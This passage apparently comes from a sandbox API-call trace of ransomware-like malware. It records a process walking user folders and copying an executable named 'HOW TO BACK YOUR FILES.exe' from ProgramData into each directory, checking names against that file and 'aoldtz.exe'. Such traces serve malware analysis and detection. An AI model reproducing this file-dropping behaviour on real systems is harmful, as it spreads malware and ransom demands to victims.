cAlternateFileName="")) returned 0x2cd068 [0065.662] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.662] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.663] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0065.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d77a8 | out: hHeap=0x2b0000) returned 1 [0065.663] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.663] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned 76 [0065.663] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0065.663] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.663] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.663] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.663] GetLastError () returned 0x0 [0065.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.663] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.664] CloseHandle (hObject=0x120) returned 1 [0065.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.664] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.664] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.664] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.664] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.664] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.664] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0065.664] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned 87 [0065.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.665] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.665] GetLastError () returned 0x0 [0065.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.665] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.665] CloseHandle (hObject=0x120) returned 1 [0065.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.665] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.665] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.665] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.665] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0065.665] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.665] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned 83 [0065.666] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.666] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.666] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.666] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.666] GetLastError () returned 0x0 [0065.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.666] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.666] CloseHandle (hObject=0x120) returned 1 [0065.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.666] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.667] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.667] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.667] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.667] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.667] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.667] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned 87 [0065.667] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.667] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.667] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.667] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.667] GetLastError () returned 0x0 [0065.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.668] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.668] CloseHandle (hObject=0x120) returned 1 [0065.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.668] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.668] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.668] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.668] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" [0065.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0065.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.668] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned 76 [0065.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player" [0065.668] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.668] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.669] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.669] GetLastError () returned 0x0 [0065.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.669] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.669] CloseHandle (hObject=0x120) returned 1 [0065.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.669] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.669] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.669] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.669] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.669] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0065.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.669] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned 91 [0065.669] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.670] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.670] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.670] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.670] GetLastError () returned 0x0 [0065.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.670] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.670] CloseHandle (hObject=0x120) returned 1 [0065.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.670] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.670] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.671] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.671] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.671] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.671] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 97 [0065.671] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.671] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.671] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.671] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.672] GetLastError () returned 0x0 [0065.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.672] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.672] CloseHandle (hObject=0x120) returned 1 [0065.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.672] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.672] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.672] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.672] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.672] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0065.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.672] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 106 [0065.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.672] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.672] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.673] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.673] GetLastError () returned 0x0 [0065.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.673] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.673] CloseHandle (hObject=0x120) returned 1 [0065.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.673] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, 